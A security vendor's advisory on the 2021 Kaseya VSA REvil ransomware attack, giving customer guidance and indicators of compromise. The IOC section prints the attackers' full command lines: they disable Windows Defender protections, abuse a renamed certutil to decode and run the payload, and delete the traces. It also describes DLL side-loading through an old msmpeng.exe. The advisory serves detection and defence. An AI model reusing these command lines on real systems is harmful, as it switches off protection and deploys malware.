---
title: Advisory on Kaseya VSA Ransomware Attack
description: Kaseya advisory on ransomware attack - Bitdefender customers given guidance and IOCs
image: https://businessinsights.bitdefender.com/hubfs/2016_-_FR_-_Files/iot-security-report-banner-lp.jpg
---

[![](https://businessinsights.bitdefender.com/hubfs/2021/09/logo-white.svg)](https://businessinsights.bitdefender.com/?hsLang=en-us)

[![CONTACT AN EXPERT](https://hubspot-no-cache-eu1-prod.s3.amazonaws.com/cta/default/341979/1d8885e9-1179-49b1-a5ec-9c75f5f670dd.png)](https://hubspot-cta-redirect-eu1-prod.s3.amazonaws.com/cta/redirect/341979/1d8885e9-1179-49b1-a5ec-9c75f5f670dd)

- [For Home](https://www.bitdefender.com/solutions/)
- [For Business](https://www.bitdefender.com/business/)
- [Resources](https://www.bitdefender.com/business/resource-library.html)
- [Webinars](https://www.bitdefender.com/business/webinars.html)

# [BUSINESS INSIGHTS](https://businessinsights.bitdefender.com/?hsLang=en-us)

[#Ransomware](https://businessinsights.bitdefender.com/topic/ransomware) [#Advanced Persistent Threats](https://businessinsights.bitdefender.com/topic/advanced-persistent-threats) [#Managed Service Providers](https://businessinsights.bitdefender.com/topic/managed-service-providers)

 By [**Bitdefender Enterprise**](https://businessinsights.bitdefender.com/author/bitdefender-enterprise) / Jul 02, 2021

# Advisory on Kaseya VSA Ransomware Attack

Share this [![Share on email](https://businessinsights.bitdefender.com/hubfs/2021/07/blog/email-color.png)](mailto:?subject=Check%20out%20https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack&utm_medium=social&utm_source=email%20&body=Check%20out%20https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack&utm_medium=social&utm_source=email) [![Share on twitter](https://businessinsights.bitdefender.com/hubfs/2021/07/blog/twitter-color.png)](https://twitter.com/intent/tweet?original_referer=https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack&utm_medium=social&utm_source=twitter&url=https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack&utm_medium=social&utm_source=twitter&source=tweetbutton&text=) [![Share on linkedin](https://businessinsights.bitdefender.com/hubfs/2021/07/blog/linkedin-color.png)](http://www.linkedin.com/shareArticle?mini=true&url=https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack&utm_medium=social&utm_source=linkedin) [![Share on facebook](https://businessinsights.bitdefender.com/hubfs/2021/07/blog/facebook-color.png)](http://www.facebook.com/share.php?u=https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack&utm_medium=social&utm_source=facebook)

Update: July 13, 2021 -- Kaseya issued a critical security update for VSA users that is available on their site - [Kaseya Critical Security Update](https://helpdesk.kaseya.com/hc/en-gb/articles/4403785889041-9-5-7a-9-5-7-2994-Feature-Release-11-July-2021-). We recommend users follow Kaseya's recommended updates as soon as possible. 

- - - - - - - - - - - - - - -

We continue to monitor and analyze the attack using Kaseya Software to deploy a variant of REvil ransomware into a victim’s environment. The attack targeted Kaseya’s managed service provider (MSP) customers, which often provide IT support to small- to medium-size businesses. By targeting MSPs, attackers also seek to access and infiltrate the MSP’s customers computer networks.  

**Guidance for Bitdefender Customers** 

- [Kaseya issued an advisory](https://helpdesk.kaseya.com/hc/en-gb/articles/4403440684689) and has urged their customers to immediately shut down on-premises VSA servers. We recommend that any Kaseya VSA users follow this guidance immediately.  
- Check on-premises and hybrid environments for known indicators of compromise (IoCs) - list of IoCs is below. 
- The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an [alert](https://us-cert.cisa.gov/ncas/current-activity/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack) stating that they are monitoring details about the attack against Kaseya VSA and the multiple MSPs that use VSA software. We recommend organizations follow the CISA alert for future updates. 

We continue to monitor and assess any customer impact, and will develop further guidance as appropriate, including how Bitdefender customers can protect or mitigate impacts to affected systems. Our Labs team findings to date indicate Bitdefender solutions detect and block a command line action and delivered payloads used in the attack, thus, protecting customers from this step in the attack. If you are a Kaseya user and believe that you are impacted, please contact us at: [gzn-gs@bitdefender.com](mailto:gzn-gs@bitdefender.com) 

Verified Indicators of Compromise 

1. Command line executed from Kaseya agent: 

C:\\Windows\\system32\\cmd.exe” /c ping 127.0.0.1 -n 5825 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\kworking\\agent.crt c:\\kworking\\agent.exe & del /q /f c:\\kworking\\agent.crt C:\\Windows\\cert.exe & c:\\kworking\\agent.exe 

and 

C:\\WINDOWS\\system32\\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\\Windows\\System32\\certutil.exe C:\\Windows\\cert.exe & echo %RANDOM% >> C:\\Windows\\cert.exe & C:\\Windows\\cert.exe -decode c:\\WaRCoMWorking\\agent.crt c:\\WaRCoMWorking\\agent.exe & del /q /f c:\\WaRCoMWorking\\agent.crt C:\\Windows\\cert.exe & c:\\WaRCoMWorking\\agent.exe 

2. Hashes: 

- 561cffbaba71a6e8cc1cdceda990ead4, detected by Bitdefender with Gen:Variant.Graftor.952042  from 15.May.2021. This is the main executable (c:\\kworking\\agent.exe) that is being decoded using certutil.exe 
- a47cf00aedf769d60d58bfe00c0b5421, detected by Bitdefender with Gen:Variant.Bulz.471680 from 13.May.2021. This is a DLL that is being dropped by the main executable and side loaded using a MS msmpeng.exe executable.  
- 0293a5d21081a94a5589976b407f5675 – the hash for agent.crt (the content of agent.exe before decryption).
  
  3. File paths:
- c:\\WaRCoMWorking\\agent.crt 
- c:\\\\WaRCoMWorking\\agent.exe 
- c:\\kworking\\agent.exe 
- c:\\kworking\\agent.crt 
- c:\\windows\\msmpeng.exe (an older version that is vulnerable for DLL side loading). This version is being dropped by the main executable and further used to load the DLL (a47cf00aedf769d60d58bfe00c0b5421). File version: MsMpEng.exe, Microsoft Malware Protection, 4.5.0218.0 

 

[![CONTACT AN EXPERT](https://hubspot-no-cache-eu1-prod.s3.amazonaws.com/cta/default/341979/1d8885e9-1179-49b1-a5ec-9c75f5f670dd.png)](https://hubspot-cta-redirect-eu1-prod.s3.amazonaws.com/cta/redirect/341979/1d8885e9-1179-49b1-a5ec-9c75f5f670dd)

### Explore More Topics

- [Enterprise Security (743)](https://businessinsights.bitdefender.com/topic/enterprise-security)
- [Threat Research (201)](https://businessinsights.bitdefender.com/topic/threat-research)
- [Cloud Security (174)](https://businessinsights.bitdefender.com/topic/cloud-security)
- [SMB Security (170)](https://businessinsights.bitdefender.com/topic/smb-security)
- [Ransomware (166)](https://businessinsights.bitdefender.com/topic/ransomware)
- [Privacy and Data Protection (137)](https://businessinsights.bitdefender.com/topic/privacy-and-data-protection)
- [Cybersecurity Awareness (134)](https://businessinsights.bitdefender.com/topic/cybersecurity-awareness)
- [Endpoint Protection & Management (126)](https://businessinsights.bitdefender.com/topic/endpoint-protection-management)
- [Endpoint Detection and Response (124)](https://businessinsights.bitdefender.com/topic/endpoint-detection-and-response)
- [Managed Detection and Response (119)](https://businessinsights.bitdefender.com/topic/managed-detection-and-response)
- [Virtualization & Data Center Security (82)](https://businessinsights.bitdefender.com/topic/virtualization-data-center-security)
- [Threat Intelligence (76)](https://businessinsights.bitdefender.com/topic/threat-intelligence)
- [IT Compliance & Regulations (71)](https://businessinsights.bitdefender.com/topic/it-compliance-regulations)
- [Bitdefender Threat Debrief (55)](https://businessinsights.bitdefender.com/topic/bitdefender-threat-debrief)
- [Managed Service Providers (53)](https://businessinsights.bitdefender.com/topic/managed-service-providers)
- [#Featured (52)](https://businessinsights.bitdefender.com/topic/featured)
- [Advanced Persistent Threats (46)](https://businessinsights.bitdefender.com/topic/advanced-persistent-threats)
- [Events (38)](https://businessinsights.bitdefender.com/topic/events)
- [Independent Testing (18)](https://businessinsights.bitdefender.com/topic/independent-testing)
- [Cybersecurity Advisory Services (9)](https://businessinsights.bitdefender.com/topic/cybersecurity-advisory-services)
- [Podcast (3)](https://businessinsights.bitdefender.com/topic/podcast)
- [top (2)](https://businessinsights.bitdefender.com/topic/top)

See all topics

### Subscribe to Blog Updates

## Read more about this topic

<https://businessinsights.bitdefender.com/whats-new-in-gravityzone-platform-february-2024-v648?hsLang=en-us>

### [What’s New in GravityZone Platform February 2024 (v6.48)](https://businessinsights.bitdefender.com/whats-new-in-gravityzone-platform-february-2024-v648?hsLang=en-us)

<https://businessinsights.bitdefender.com/technical-advisory-openclaw-exploitation-enterprise-networks?hsLang=en-us>

### [Technical Advisory: OpenClaw Exploitation in Enterprise Networks](https://businessinsights.bitdefender.com/technical-advisory-openclaw-exploitation-enterprise-networks?hsLang=en-us)

<https://businessinsights.bitdefender.com/whats-new-in-gravityzone-february-2025?hsLang=en-us>

### [What’s New in GravityZone February 2025 (v 6.59)](https://businessinsights.bitdefender.com/whats-new-in-gravityzone-february-2025?hsLang=en-us)

![bitdefender](https://businessinsights.bitdefender.com/hs-fs/file-2685110570-png/Bitdefender-Mar2015-Theme/Images/avatar_img_footer.png)

![bitdefender](https://businessinsights.bitdefender.com/hs-fs/file-2676149282-png/Bitdefender-Mar2015-Theme/Images/logo_white_footer.png)

- [![https://twitter.com/Bitdefender_Ent](https://businessinsights.bitdefender.com/hs-fs/file-2658233851-png/Bitdefender-Mar2015-Theme/Images/ft_soc_tw.png?width=33&name=ft_soc_tw.png)](https://twitter.com/Bitdefender_Ent)
- [![Linkedin-icon-300x300](https://businessinsights.bitdefender.com/hs-fs/hubfs/Bitdefender-Mar2015-Theme/Images/Linkedin-icon-300x300.png?width=33&name=Linkedin-icon-300x300.png)](https://www.linkedin.com/company/bitdefender-gravityzone-enterprise-security)
- [![](https://businessinsights.bitdefender.com/hs-fs/file-2676149307-png/Bitdefender-Mar2015-Theme/Images/ft_soc_yt.png)](https://www.youtube.com/user/BitdefenderSecurity)

- [Legal Terms](https://www.bitdefender.com/legal/)
- [Privacy Policy](https://www.bitdefender.com/site/view/legal-privacy-policy-for-bitdefender-websites.html)
- [EULA](https://www.bitdefender.com/site/view/legal-eula.html)
- [Contact Us](https://www.bitdefender.com/business/contact.html)

Copyright © 1997-2023 Bitdefender All rights reserved.

![](https://px.spiceworks.com/px/5rec)

```json
{
  "@context" : "https://schema.org",
  "@type" : "BlogPosting",
  "author" : {
    "@type" : "Person",
    "name" : "Bitdefender Enterprise",
    "url" : "https://businessinsights.bitdefender.com/author/bitdefender-enterprise"
  },
  "dateModified" : "2022-08-22T16:53:57.156Z",
  "datePublished" : "2021-07-03T00:10:09.000Z",
  "headline" : "Advisory on Kaseya VSA Ransomware Attack",
  "image" : [ "https://businessinsights.bitdefender.com/hubfs/2016_-_FR_-_Files/iot-security-report-banner-lp.jpg" ],
  "mainEntityOfPage" : {
    "@id" : "https://businessinsights.bitdefender.com/advisory-on-kaseya-vsa-ransomware-attack",
    "@type" : "WebPage"
  },
  "publisher" : {
    "@type" : "Organization",
    "logo" : {
      "@type" : "ImageObject",
      "url" : "https://businessinsights.bitdefender.com/hubfs/Bitdefender_Logo_Transparent-2.png"
    },
    "name" : "Bitdefender"
  }
}
```